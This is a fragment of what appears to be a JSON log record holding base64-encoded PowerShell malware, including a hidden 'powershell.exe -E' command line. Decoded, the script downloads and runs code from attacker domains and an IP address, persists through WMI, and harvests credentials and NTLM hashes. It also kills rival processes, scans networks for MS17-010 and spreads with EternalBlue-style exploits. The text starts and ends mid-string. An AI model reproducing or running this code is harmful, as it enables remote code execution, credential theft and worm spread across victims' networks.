BjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkA